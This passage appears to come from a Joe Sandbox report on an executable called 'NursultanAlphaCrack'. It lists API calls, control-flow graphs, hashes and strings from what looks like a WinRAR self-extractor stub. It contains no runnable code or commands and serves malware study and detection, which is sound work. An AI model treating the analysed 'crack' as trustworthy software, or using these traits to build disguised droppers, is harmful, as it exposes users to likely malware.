                                                                                        • LockResource.KERNEL32(00000000,?,?,?,001DB73D,00000066), ref: 001DA712
                                                                                        • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,001DB73D,00000066), ref: 001DA72D
                                                                                        • GlobalLock.KERNEL32(00000000), ref: 001DA73E
                                                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 001DA762
                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 001DA7C6
                                                                                          • Part of subcall function 001DA626: GdipAlloc.GDIPLUS(00000010), ref: 001DA62C
                                                                                        • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 001DA7A7
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 001DA7CD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                                                        • String ID: PNG
                                                                                        • API String ID: 211097158-364855578
                                                                                        • Opcode ID: 84b68bb065d02cd4221576c1864db72c77cecf7f6c5c90ebe21c06db7d3f7e4b
                                                                                        • Instruction ID: d8cb1f4e3d0c1c68c6b8a6f0364d2d698a8bce8eec5f9f8818a3de31630fd75d
                                                                                        • Opcode Fuzzy Hash: 84b68bb065d02cd4221576c1864db72c77cecf7f6c5c90ebe21c06db7d3f7e4b
                                                                                        • Instruction Fuzzy Hash: 02319F76604302AFD711DF21EC88D2BBBB9EF84760B04051AF91582721EB32DD94CAA1

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1034 1ca69b-1ca6bf call 1dec50 1037 1ca727-1ca730 FindNextFileW 1034->1037 1038 1ca6c1-1ca6ce FindFirstFileW 1034->1038 1040 1ca742-1ca7ff call 1d0602 call 1cc310 call 1d15da * 3 1037->1040 1041 1ca732-1ca740 GetLastError 1037->1041 1039 1ca6d0-1ca6e2 call 1cbb03 1038->1039 1038->1040 1049 1ca6fe-1ca707 GetLastError 1039->1049 1050 1ca6e4-1ca6fc FindFirstFileW 1039->1050 1047 1ca804-1ca811 1040->1047 1042 1ca719-1ca722 1041->1042 1042->1047 1052 1ca709-1ca70c 1049->1052 1053 1ca717 1049->1053 1050->1040 1050->1049 1052->1053 1055 1ca70e-1ca711 1052->1055 1053->1042 1055->1053 1057 1ca713-1ca715 1055->1057 1057->1042
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,001CA592,000000FF,?,?), ref: 001CA6C4
                                                                                          • Part of subcall function 001CBB03: _wcslen.LIBCMT ref: 001CBB27
                                                                                        • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,001CA592,000000FF,?,?), ref: 001CA6F2
                                                                                        • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,001CA592,000000FF,?,?), ref: 001CA6FE
                                                                                        • FindNextFileW.KERNEL32(?,?,?,?,?,?,001CA592,000000FF,?,?), ref: 001CA728
                                                                                        • GetLastError.KERNEL32(?,?,?,?,001CA592,000000FF,?,?), ref: 001CA734
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                                                        • String ID:
                                                                                        • API String ID: 42610566-0
                                                                                        • Opcode ID: c54c238c7efc5ff1bdf5625738285bbbd55d6ea3b5e22226334e8f1b3155fa8e
                                                                                        • Instruction ID: 9ef1e835d5fe88e7d2de17e6776aad1991f1a464c8cb31829ff2b2c0d623cfde
                                                                                        • Opcode Fuzzy Hash: c54c238c7efc5ff1bdf5625738285bbbd55d6ea3b5e22226334e8f1b3155fa8e
                                                                                        • Instruction Fuzzy Hash: 9D415E72500619ABCB25DF68CC84BE9B7B8BF58354F50419AF56DD3200D734AE90CF90
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32(00000000,?,001E7DC4,00000000,001FC300,0000000C,001E7F1B,00000000,00000002,00000000), ref: 001E7E0F
                                                                                        • TerminateProcess.KERNEL32(00000000,?,001E7DC4,00000000,001FC300,0000000C,001E7F1B,00000000,00000002,00000000), ref: 001E7E16
                                                                                        • ExitProcess.KERNEL32 ref: 001E7E28
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                        • String ID:
                                                                                        • API String ID: 1703294689-0
                                                                                        • Opcode ID: a125d5c55d3456a62c81e0c50ded4718441bd24620eb3b3ab0b0789614a0b752
                                                                                        • Instruction ID: c73493c90684d20e1e99734244d3514445da793e8a2a06fac135641bb1d1607f
                                                                                        • Opcode Fuzzy Hash: a125d5c55d3456a62c81e0c50ded4718441bd24620eb3b3ab0b0789614a0b752
                                                                                        • Instruction Fuzzy Hash: 8AE0BF31004594ABDF116F55DD4A99E7F69EF50341B004455F8198A572CB35EE91CB90
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: H_prolog
                                                                                        • String ID:
                                                                                        • API String ID: 3519838083-0
                                                                                        • Opcode ID: f112ad4692c51218441dc8c78c6159a6dc5aed2db7c0cf4d373a0ab7d4ce3e6f
                                                                                        • Instruction ID: 14a6d6312d9d46244e27ec5e374eb89f72217a6011a5ffadd7855985f5e2a523
                                                                                        • Opcode Fuzzy Hash: f112ad4692c51218441dc8c78c6159a6dc5aed2db7c0cf4d373a0ab7d4ce3e6f
                                                                                        • Instruction Fuzzy Hash: F082D870904285AEDF15DB64C8D5FFABBB9AF35300F0841BDE8499B182DB71DA85CB60
                                                                                        APIs
                                                                                        • __EH_prolog.LIBCMT ref: 001DB7E5
                                                                                          • Part of subcall function 001C1316: GetDlgItem.USER32(00000000,00003021), ref: 001C135A
                                                                                          • Part of subcall function 001C1316: SetWindowTextW.USER32(00000000,001F35F4), ref: 001C1370
                                                                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 001DB8D1
                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 001DB8EF
                                                                                        • IsDialogMessageW.USER32(?,?), ref: 001DB902
                                                                                        • TranslateMessage.USER32(?), ref: 001DB910
                                                                                        • DispatchMessageW.USER32(?), ref: 001DB91A
                                                                                        • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 001DB93D
                                                                                        • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 001DB960
                                                                                        • GetDlgItem.USER32(?,00000068), ref: 001DB983
                                                                                        • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 001DB99E
                                                                                        • SendMessageW.USER32(00000000,000000C2,00000000,001F35F4), ref: 001DB9B1
                                                                                          • Part of subcall function 001DD453: _wcslen.LIBCMT ref: 001DD47D
                                                                                        • SetFocus.USER32(00000000), ref: 001DB9B8
                                                                                        • _swprintf.LIBCMT ref: 001DBA24
                                                                                          • Part of subcall function 001C4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001C40A5
                                                                                          • Part of subcall function 001DD4D4: GetDlgItem.USER32(00000068,0021FCB8), ref: 001DD4E8
                                                                                          • Part of subcall function 001DD4D4: ShowWindow.USER32(00000000,00000005,?,?,?,001DAF07,00000001,?,?,001DB7B9,001F506C,0021FCB8,0021FCB8,00001000,00000000,00000000), ref: 001DD510
                                                                                          • Part of subcall function 001DD4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 001DD51B
                                                                                          • Part of subcall function 001DD4D4: SendMessageW.USER32(00000000,000000C2,00000000,001F35F4), ref: 001DD529
                                                                                          • Part of subcall function 001DD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 001DD53F
                                                                                          • Part of subcall function 001DD4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 001DD559
                                                                                          • Part of subcall function 001DD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 001DD59D
                                                                                          • Part of subcall function 001DD4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 001DD5AB
                                                                                          • Part of subcall function 001DD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 001DD5BA
                                                                                          • Part of subcall function 001DD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 001DD5E1
                                                                                          • Part of subcall function 001DD4D4: SendMessageW.USER32(00000000,000000C2,00000000,001F43F4), ref: 001DD5F0
                                                                                        • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 001DBA68
                                                                                        • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 001DBA90
                                                                                        • GetTickCount.KERNEL32 ref: 001DBAAE
                                                                                        • _swprintf.LIBCMT ref: 001DBAC2
                                                                                        • GetLastError.KERNEL32(?,00000011), ref: 001DBAF4
                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 001DBB43
                                                                                        • _swprintf.LIBCMT ref: 001DBB7C
                                                                                        • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 001DBBD0
                                                                                        • GetCommandLineW.KERNEL32 ref: 001DBBEA
                                                                                        • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 001DBC47
                                                                                        • ShellExecuteExW.SHELL32(0000003C), ref: 001DBC6F
                                                                                        • Sleep.KERNEL32(00000064), ref: 001DBCB9
                                                                                        • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 001DBCE2
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 001DBCEB
                                                                                        • _swprintf.LIBCMT ref: 001DBD1E
                                                                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 001DBD7D
                                                                                        • SetDlgItemTextW.USER32(?,00000065,001F35F4), ref: 001DBD94
                                                                                        • GetDlgItem.USER32(?,00000065), ref: 001DBD9D
                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 001DBDAC
                                                                                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 001DBDBB
                                                                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 001DBE68
                                                                                        • _wcslen.LIBCMT ref: 001DBEBE
                                                                                        • _swprintf.LIBCMT ref: 001DBEE8
                                                                                        • SendMessageW.USER32(?,00000080,00000001,?), ref: 001DBF32
                                                                                        • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 001DBF4C
                                                                                        • GetDlgItem.USER32(?,00000068), ref: 001DBF55
                                                                                        • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 001DBF6B
                                                                                        • GetDlgItem.USER32(?,00000066), ref: 001DBF85
                                                                                        • SetWindowTextW.USER32(00000000,0020A472), ref: 001DBFA7
                                                                                        • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 001DC007
                                                                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 001DC01A
                                                                                        • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 001DC0BD
                                                                                        • EnableWindow.USER32(00000000,00000000), ref: 001DC197
                                                                                        • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 001DC1D9
                                                                                          • Part of subcall function 001DC73F: __EH_prolog.LIBCMT ref: 001DC744
                                                                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 001DC1FD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l
                                                                                        • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                                                        • API String ID: 3445078344-2966512602
                                                                                        • Opcode ID: 7ef8071a9722ad3b7603f111113182a71f3f29551c98ba197be3a3eb57686ca1
                                                                                        • Instruction ID: b58a73e6463d48f7f38cef7604539cb1ffe2cd7aa48863177af75805c1e178eb
                                                                                        • Opcode Fuzzy Hash: 7ef8071a9722ad3b7603f111113182a71f3f29551c98ba197be3a3eb57686ca1
                                                                                        • Instruction Fuzzy Hash: 3C420971944355FAEB21DBB0AC8EFBE77BCAB21700F00405AF645A62D3CB749A45CB61

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 268 1d0863-1d0886 call 1dec50 GetModuleHandleW 271 1d0888-1d089f GetProcAddress 268->271 272 1d08e7-1d0b48 268->272 275 1d08b9-1d08c9 GetProcAddress 271->275 276 1d08a1-1d08b7 271->276 273 1d0b4e-1d0b59 call 1e75fb 272->273 274 1d0c14-1d0c40 GetModuleFileNameW call 1cc29a call 1d0602 272->274 273->274 285 1d0b5f-1d0b8d GetModuleFileNameW CreateFileW 273->285 290 1d0c42-1d0c4e call 1cb146 274->290 278 1d08cb-1d08e0 275->278 279 1d08e5 275->279 276->275 278->279 279->272 288 1d0b8f-1d0b9b SetFilePointer 285->288 289 1d0c08-1d0c0f CloseHandle 285->289 288->289 291 1d0b9d-1d0bb9 ReadFile 288->291 289->274 297 1d0c7d-1d0ca4 call 1cc310 GetFileAttributesW 290->297 298 1d0c50-1d0c5b call 1d081b 290->298 291->289 294 1d0bbb-1d0be0 291->294 296 1d0bfd-1d0c06 call 1d0371 294->296 296->289 305 1d0be2-1d0bfc call 1d081b 296->305 308 1d0cae 297->308 309 1d0ca6-1d0caa 297->309 298->297 307 1d0c5d-1d0c7b CompareStringW 298->307 305->296 307->297 307->309 310 1d0cb0-1d0cb5 308->310 309->290 312 1d0cac 309->312 313 1d0cec-1d0cee 310->313 314 1d0cb7 310->314 312->310 316 1d0dfb-1d0e05 313->316 317 1d0cf4-1d0d0b call 1cc2e4 call 1cb146 313->317 315 1d0cb9-1d0ce0 call 1cc310 GetFileAttributesW 314->315 322 1d0cea 315->322 323 1d0ce2-1d0ce6 315->323 327 1d0d0d-1d0d6e call 1d081b * 2 call 1ce617 call 1c4092 call 1ce617 call 1da7e4 317->327 328 1d0d73-1d0da6 call 1c4092 AllocConsole 317->328 322->313 323->315 325 1d0ce8 323->325 325->313 335 1d0df3-1d0df5 ExitProcess 327->335 334 1d0da8-1d0ded GetCurrentProcessId AttachConsole call 1e3e13 GetStdHandle WriteConsoleW Sleep FreeConsole 328->334 328->335 334->335
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(kernel32), ref: 001D087C
                                                                                        • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 001D088E
                                                                                        • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 001D08BF
                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 001D0B69
                                                                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001D0B83
                                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 001D0B93
                                                                                        • ReadFile.KERNEL32(00000000,?,00007FFE,001F3C7C,00000000), ref: 001D0BB1
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 001D0C09
                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 001D0C1E
                                                                                        • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,001F3C7C,?,00000000,?,00000800), ref: 001D0C72
                                                                                        • GetFileAttributesW.KERNELBASE(?,?,001F3C7C,00000800,?,00000000,?,00000800), ref: 001D0C9C
                                                                                        • GetFileAttributesW.KERNEL32(?,?,001F3D44,00000800), ref: 001D0CD8
                                                                                          • Part of subcall function 001D081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 001D0836
                                                                                          • Part of subcall function 001D081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,001CF2D8,Crypt32.dll,00000000,001CF35C,?,?,001CF33E,?,?,?), ref: 001D0858
                                                                                        • _swprintf.LIBCMT ref: 001D0D4A
                                                                                        • _swprintf.LIBCMT ref: 001D0D96
                                                                                          • Part of subcall function 001C4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001C40A5
                                                                                        • AllocConsole.KERNEL32 ref: 001D0D9E
                                                                                        • GetCurrentProcessId.KERNEL32 ref: 001D0DA8
                                                                                        • AttachConsole.KERNEL32(00000000), ref: 001D0DAF
                                                                                        • _wcslen.LIBCMT ref: 001D0DC4
                                                                                        • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 001D0DD5
                                                                                        • WriteConsoleW.KERNEL32(00000000), ref: 001D0DDC
                                                                                        • Sleep.KERNEL32(00002710), ref: 001D0DE7
                                                                                        • FreeConsole.KERNEL32 ref: 001D0DED
                                                                                        • ExitProcess.KERNEL32 ref: 001D0DF5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                                                        • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                                                        • API String ID: 1207345701-3298887752
                                                                                        • Opcode ID: b1e63bfed6c69ee4a58b62f4b39af126ce5a1ad1062fea94c3c3cdad60322281
                                                                                        • Instruction ID: f43f6a9e31edc99e58080536e36bcf5a8530b8af2e9ad3a5d1a6ab9fd9001fd8
                                                                                        • Opcode Fuzzy Hash: b1e63bfed6c69ee4a58b62f4b39af126ce5a1ad1062fea94c3c3cdad60322281
                                                                                        • Instruction Fuzzy Hash: FED164B1408388ABD731DF50C949BFFBAE8BF95704F50491EF399A6250CB709649CB62

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 347 1dc73f-1dc757 call 1deb78 call 1dec50 352 1dd40d-1dd418 347->352 353 1dc75d-1dc787 call 1db314 347->353 353->352 356 1dc78d-1dc792 353->356 357 1dc793-1dc7a1 356->357 358 1dc7a2-1dc7b7 call 1daf98 357->358 361 1dc7b9 358->361 362 1dc7bb-1dc7d0 call 1d1fbb 361->362 365 1dc7dd-1dc7e0 362->365 366 1dc7d2-1dc7d6 362->366 368 1dd3d9-1dd404 call 1db314 365->368 369 1dc7e6 365->369 366->362 367 1dc7d8 366->367 367->368 368->357 381 1dd40a-1dd40c 368->381 371 1dc7ed-1dc7f0 369->371 372 1dca7c-1dca7e 369->372 373 1dca5f-1dca61 369->373 374 1dc9be-1dc9c0 369->374 371->368 379 1dc7f6-1dc850 call 1da64d call 1cbdf3 call 1ca544 call 1ca67e call 1c6edb 371->379 372->368 377 1dca84-1dca8b 372->377 373->368 376 1dca67-1dca77 SetWindowTextW 373->376 374->368 378 1dc9c6-1dc9d2 374->378 376->368 377->368 382 1dca91-1dcaaa 377->382 383 1dc9d4-1dc9e5 call 1e7686 378->383 384 1dc9e6-1dc9eb 378->384 436 1dc98f-1dc9a4 call 1ca5d1 379->436 381->352 389 1dcaac 382->389 390 1dcab2-1dcac0 call 1e3e13 382->390 383->384 387 1dc9ed-1dc9f3 384->387 388 1dc9f5-1dca00 call 1db48e 384->388 394 1dca05-1dca07 387->394 388->394 389->390 390->368 401 1dcac6-1dcacf 390->401 399 1dca09-1dca10 call 1e3e13 394->399 400 1dca12-1dca32 call 1e3e13 call 1e3e3e 394->400 399->400 421 1dca4b-1dca4d 400->421 422 1dca34-1dca3b 400->422 405 1dcaf8-1dcafb 401->405 406 1dcad1-1dcad5 401->406 411 1dcb01-1dcb04 405->411 413 1dcbe0-1dcbee call 1d0602 405->413 410 1dcad7-1dcadf 406->410 406->411 410->368 416 1dcae5-1dcaf3 call 1d0602 410->416 418 1dcb06-1dcb0b 411->418 419 1dcb11-1dcb2c 411->419 429 1dcbf0-1dcc04 call 1e279b 413->429 416->429 418->413 418->419 437 1dcb2e-1dcb68 419->437 438 1dcb76-1dcb7d 419->438 421->368 428 1dca53-1dca5a call 1e3e2e 421->428 426 1dca3d-1dca3f 422->426 427 1dca42-1dca4a call 1e7686 422->427 426->427 427->421 428->368 447 1dcc06-1dcc0a 429->447 448 1dcc11-1dcc62 call 1d0602 call 1db1be GetDlgItem SetWindowTextW SendMessageW call 1e3e49 429->448 453 1dc9aa-1dc9b9 call 1ca55a 436->453 454 1dc855-1dc869 SetFileAttributesW 436->454 464 1dcb6c-1dcb6e 437->464 465 1dcb6a 437->465 440 1dcb7f-1dcb97 call 1e3e13 438->440 441 1dcbab-1dcbce call 1e3e13 * 2 438->441 440->441 458 1dcb99-1dcba6 call 1d05da 440->458 441->429 473 1dcbd0-1dcbde call 1d05da 441->473 447->448 452 1dcc0c-1dcc0e 447->452 480 1dcc67-1dcc6b 448->480 452->448 453->368 460 1dc90f-1dc91f GetFileAttributesW 454->460 461 1dc86f-1dc8a2 call 1cb991 call 1cb690 call 1e3e13 454->461 458->441 460->436 470 1dc921-1dc930 DeleteFileW 460->470 490 1dc8b5-1dc8c3 call 1cbdb4 461->490 491 1dc8a4-1dc8b3 call 1e3e13 461->491 464->438 465->464 470->436 472 1dc932-1dc935 470->472 477 1dc939-1dc965 call 1c4092 GetFileAttributesW 472->477 473->429 488 1dc937-1dc938 477->488 489 1dc967-1dc97d MoveFileW 477->489 480->368 485 1dcc71-1dcc85 SendMessageW 480->485 485->368 488->477 489->436 492 1dc97f-1dc989 MoveFileExW 489->492 490->453 497 1dc8c9-1dc908 call 1e3e13 call 1dfff0 490->497 491->490 491->497 492->436 497->460
                                                                                        APIs
                                                                                        • __EH_prolog.LIBCMT ref: 001DC744
                                                                                          • Part of subcall function 001DB314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 001DB3FB
                                                                                        • _wcslen.LIBCMT ref: 001DCA0A
                                                                                        • _wcslen.LIBCMT ref: 001DCA13
                                                                                        • SetWindowTextW.USER32(?,?), ref: 001DCA71
                                                                                        • _wcslen.LIBCMT ref: 001DCAB3
                                                                                        • _wcsrchr.LIBVCRUNTIME ref: 001DCBFB
                                                                                        • GetDlgItem.USER32(?,00000066), ref: 001DCC36
                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 001DCC46
                                                                                        • SendMessageW.USER32(00000000,00000143,00000000,0020A472), ref: 001DCC54
                                                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 001DCC7F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                                                                        • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                                        • API String ID: 2804936435-312220925
